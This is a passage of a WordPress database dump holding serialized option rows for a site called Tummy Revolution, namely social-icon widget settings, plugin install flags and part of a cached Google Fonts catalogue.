17px\";}i:4;a:11:{s:9:\"icon_pack\";s:12:\"font_elegant\";s:7:\"fa_icon\";s:0:\"\";s:7:\"fe_icon\";s:14:\"social_twitter\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:22:\"http://www.twitter.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:16:\"0px 0px 0px 17px\";}i:5;a:11:{s:9:\"icon_pack\";s:12:\"font_elegant\";s:7:\"fa_icon\";s:0:\"\";s:7:\"fe_icon\";s:15:\"social_facebook\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:23:\"http://www.facebook.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:16:\"0px 0px 0px 17px\";}i:14;a:11:{s:9:\"icon_pack\";s:12:\"font_awesome\";s:7:\"fa_icon\";s:9:\"fa-tumblr\";s:7:\"fe_icon\";s:0:\"\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:21:\"http://www.tumblr.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:2:\"18\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:16:\"9px 10px 0px 0px\";}i:15;a:11:{s:9:\"icon_pack\";s:12:\"font_awesome\";s:7:\"fa_icon\";s:12:\"fa-pinterest\";s:7:\"fe_icon\";s:0:\"\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:24:\"http://www.pinterest.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:17:\"8px 10px 0px 10px\";}i:16;a:11:{s:9:\"icon_pack\";s:12:\"font_awesome\";s:7:\"fa_icon\";s:11:\"fa-facebook\";s:7:\"fe_icon\";s:0:\"\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:23:\"http://www.facebook.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:17:\"9px 10px 0px 10px\";}i:17;a:11:{s:9:\"icon_pack\";s:12:\"font_awesome\";s:7:\"fa_icon\";s:12:\"fa-instagram\";s:7:\"fe_icon\";s:0:\"\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:24:\"http://www.instagram.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:17:\"8px 10px 0px 10px\";}i:22;a:11:{s:9:\"icon_pack\";s:12:\"font_awesome\";s:7:\"fa_icon\";s:9:\"fa-tumblr\";s:7:\"fe_icon\";s:0:\"\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:0:\"\";s:6:\"target\";s:5:\"_self\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:7:\"#212121\";s:11:\"hover_color\";s:7:\"#ffbea5\";s:6:\"margin\";s:13:\"0 18px 0 46px\";}i:23;a:11:{s:9:\"icon_pack\";s:12:\"font_elegant\";s:7:\"fa_icon\";s:12:\"fa-pinterest\";s:7:\"fe_icon\";s:16:\"social_pinterest\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:0:\"\";s:6:\"target\";s:5:\"_self\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:7:\"#212121\";s:11:\"hover_color\";s:7:\"#ffbea5\";s:6:\"margin\";s:16:\"2px 18px 0px 3px\";}i:24;a:11:{s:9:\"icon_pack\";s:12:\"font_awesome\";s:7:\"fa_icon\";s:11:\"fa-facebook\";s:7:\"fe_icon\";s:0:\"\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:0:\"\";s:6:\"target\";s:5:\"_self\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:7:\"#212121\";s:11:\"hover_color\";s:7:\"#ffbea5\";s:6:\"margin\";s:10:\"0 18px 0 0\";}i:25;a:11:{s:9:\"icon_pack\";s:12:\"font_awesome\";s:7:\"fa_icon\";s:12:\"fa-instagram\";s:7:\"fe_icon\";s:0:\"\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:0:\"\";s:6:\"target\";s:5:\"_self\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:7:\"#212121\";s:11:\"hover_color\";s:7:\"#ffbea5\";s:6:\"margin\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(333,'widget_qodef_social_icons_group_widget','a:4:{i:2;a:45:{s:12:\"widget_title\";s:9:\"Follow Me\";s:9:\"icon_pack\";s:12:\"font_awesome\";s:9:\"fa_icon_1\";s:10:\"fa-twitter\";s:9:\"fe_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:0:\"\";s:6:\"link_1\";s:35:\"https://twitter.com/tummyrevolution\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fa_icon_2\";s:14:\"fa-pinterest-p\";s:9:\"fe_icon_2\";s:16:\"social_pinterest\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:0:\"\";s:6:\"link_2\";s:35:\"https://twitter.com/tummyrevolution\";s:8:\"target_2\";s:6:\"_blank\";s:9:\"fa_icon_3\";s:11:\"fa-facebook\";s:9:\"fe_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:0:\"\";s:6:\"link_3\";s:41:\"https://web.facebook.com/tummyrevolution/\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fa_icon_4\";s:12:\"fa-instagram\";s:9:\"fe_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:42:\"https://www.instagram.com/tummyrevolution/\";s:8:\"target_4\";s:6:\"_blank\";s:9:\"fa_icon_5\";s:11:\"fa-envelope\";s:9:\"fe_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:31:\"mailto:info@tummyrevolution.com\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fa_icon_6\";s:0:\"\";s:9:\"fe_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:5:\"_self\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:4:\"18px\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:0:\"\";}i:3;a:45:{s:12:\"widget_title\";s:9:\"Follow Me\";s:9:\"icon_pack\";s:12:\"font_awesome\";s:9:\"fa_icon_1\";s:10:\"fa-twitter\";s:9:\"fe_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:0:\"\";s:6:\"link_1\";s:35:\"https://twitter.com/tummyrevolution\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fa_icon_2\";s:14:\"fa-pinterest-p\";s:9:\"fe_icon_2\";s:0:\"\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:0:\"\";s:6:\"link_2\";s:35:\"https://twitter.com/tummyrevolution\";s:8:\"target_2\";s:6:\"_blank\";s:9:\"fa_icon_3\";s:11:\"fa-facebook\";s:9:\"fe_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:0:\"\";s:6:\"link_3\";s:41:\"https://web.facebook.com/tummyrevolution/\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fa_icon_4\";s:12:\"fa-instagram\";s:9:\"fe_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:42:\"https://www.instagram.com/tummyrevolution/\";s:8:\"target_4\";s:6:\"_blank\";s:9:\"fa_icon_5\";s:11:\"fa-envelope\";s:9:\"fe_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:31:\"mailto:info@tummyrevolution.com\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fa_icon_6\";s:0:\"\";s:9:\"fe_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:5:\"_self\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:4:\"18px\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:0:\"\";}i:4;a:45:{s:12:\"widget_title\";s:9:\"Follow Me\";s:9:\"icon_pack\";s:12:\"font_awesome\";s:9:\"fa_icon_1\";s:9:\"fa-tumblr\";s:9:\"fe_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:0:\"\";s:6:\"link_1\";s:21:\"http://www.tumblr.com\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fa_icon_2\";s:14:\"fa-pinterest-p\";s:9:\"fe_icon_2\";s:0:\"\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:0:\"\";s:6:\"link_2\";s:20:\"http://www.pinterest\";s:8:\"target_2\";s:6:\"_blank\";s:9:\"fa_icon_3\";s:11:\"fa-facebook\";s:9:\"fe_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:0:\"\";s:6:\"link_3\";s:23:\"http://www.facebook.com\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fa_icon_4\";s:12:\"fa-instagram\";s:9:\"fe_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:24:\"http://www.instagram.com\";s:8:\"target_4\";s:6:\"_blank\";s:9:\"fa_icon_5\";s:0:\"\";s:9:\"fe_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:0:\"\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fa_icon_6\";s:0:\"\";s:9:\"fe_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:5:\"_self\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:4:\"18px\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(334,'widget_qodef_sticky_sidebar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(335,'woocommerce_onboarding_opt_in','no','yes'),(153163,'woocommerce_admin_version','1.0.4','yes'),(339,'woocommerce_admin_install_timestamp','1646951001','yes'),(341,'timetable_event_hours_table_installed','1','yes'),(342,'timetable_event_hours_table_column_available_places','1','yes'),(343,'timetable_event_hours_table_column_slots_per_user','1','yes'),(344,'timetable_event_hours_booking_table_installed','1','yes'),(345,'timetable_event_hours_booking_table_modify_1','1','yes'),(346,'timetable_timetable_guests_table_installed','1','yes'); INSERT INTO `wpvt_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (347,'timetable_google_fonts','O:8:\"stdClass\":3:{s:4:\"kind\";s:20:\"webfonts#webfontList\";s:5:\"items\";a:1451:{i:0;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"ABeeZee\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/abeezee/v22/esDR31xSG-6AGleN6tKukbcHCpE.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/abeezee/v22/esDT31xSG-6AGleN2tCklZUCGpG-GQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Abel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/abel/v18/MwQ5bhbm2POE6VhLPJp6qGI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:2;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Abhaya Libre\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:7:\"sinhala\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/abhayalibre/v13/e3tmeuGtX-Co5MNzeAOqinEge0PWovdU4w.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEYj2ryqtxI6oYtBA.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEYo23yqtxI6oYtBA.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEYx2zyqtxI6oYtBA.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEY22_yqtxI6oYtBA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:3;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Aboreto\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/aboreto/v2/5DCXAKLhwDDQ4N8blKTeA2yuxSY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:4;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Abril Fatface\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/abrilfatface/v19/zOL64pLDlL1D99S8g8PtiKchm-BsjOLhZBY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:5;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Aclonica\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/aclonica/v18/K2FyfZJVlfNNSEBXGb7TCI6oBjLz.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:6;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Acme\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/acme/v18/RrQfboBx-C5_bx3Lb23lzLk.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:7;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Actor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/actor/v17/wEOzEBbCkc5cO3ekXygtUMIO.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:8;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Adamina\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/adamina/v21/j8_r6-DH1bjoc-dwu-reETl4Bno.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:9;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Advent Pro\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"greek\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:79:\"http://fonts.gstatic.com/s/adventpro/v18/V8mCoQfxVT4Dvddr_yOwjVmtLZxcBtItFw.ttf\";s:3:\"200\";s:80:\"http://fonts.gstatic.com/s/adventpro/v18/V8mDoQfxVT4Dvddr_yOwjfWMDbZyCts0DqQ.ttf\";s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/adventpro/v18/V8mDoQfxVT4Dvddr_yOwjZGPDbZyCts0DqQ.ttf\";s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/adventpro/v18/V8mAoQfxVT4Dvddr_yOwtT2nKb5ZFtI.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/adventpro/v18/V8mDoQfxVT4Dvddr_yOwjcmODbZyCts0DqQ.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/adventpro/v18/V8mDoQfxVT4Dvddr_yOwjeWJDbZyCts0DqQ.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/adventpro/v18/V8mDoQfxVT4Dvddr_yOwjYGIDbZyCts0DqQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:10;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Aguafina Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/aguafinascript/v16/If2QXTv_ZzSxGIO30LemWEOmt1bHqs4pgicOrg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:11;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Akaya Kanadaka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/akayakanadaka/v16/N0bM2S5CPO5oOQqvazoRRb-8-PfRS5VBBSSF.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:12;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Akaya Telivigala\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"telugu\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/akayatelivigala/v22/lJwc-oo_iG9wXqU3rCTD395tp0uifdLdsIH0YH8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:13;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Akronim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/akronim/v23/fdN-9sqWtWZZlHRp-gBxkFYN-a8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:14;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Akshar\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSSgFy9CY94XsnPc.ttf\";s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSXYFy9CY94XsnPc.ttf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSUQFy9CY94XsnPc.ttf\";s:3:\"600\";s:84:\"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSagCy9CY94XsnPc.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSZECy9CY94XsnPc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:15;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Aladin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/aladin/v18/ZgNSjPJFPrvJV5f16Sf4pGT2Ng.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:16;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Alata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:64:\"http://fonts.gstatic.com/s/alata/v9/PbytFmztEwbIofe6xKcRQEOX.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:17;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Alatsi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/alatsi/v9/TK3iWkUJAxQ2nLNGHjUHte5fKg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:18;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Albert Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-07-06\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHq5L_rI32TxAj1g.ttf\";s:3:\"200\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHK5P_rI32TxAj1g.ttf\";s:3:\"300\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSH9ZP_rI32TxAj1g.ttf\";s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHq5P_rI32TxAj1g.ttf\";s:3:\"500\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHmZP_rI32TxAj1g.ttf\";s:3:\"600\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHdZT_rI32TxAj1g.ttf\";s:3:\"700\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHTJT_rI32TxAj1g.ttf\";s:3:\"800\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHK5T_rI32TxAj1g.ttf\";s:3:\"900\";s:95:\"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHApT_rI32TxAj1g.ttf\";s:9:\"100italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9AX7ofybRUz1r5t.ttf\";s:9:\"200italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9CX74fybRUz1r5t.ttf\";s:9:\"300italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9BJ74fybRUz1r5t.ttf\";s:6:\"italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGa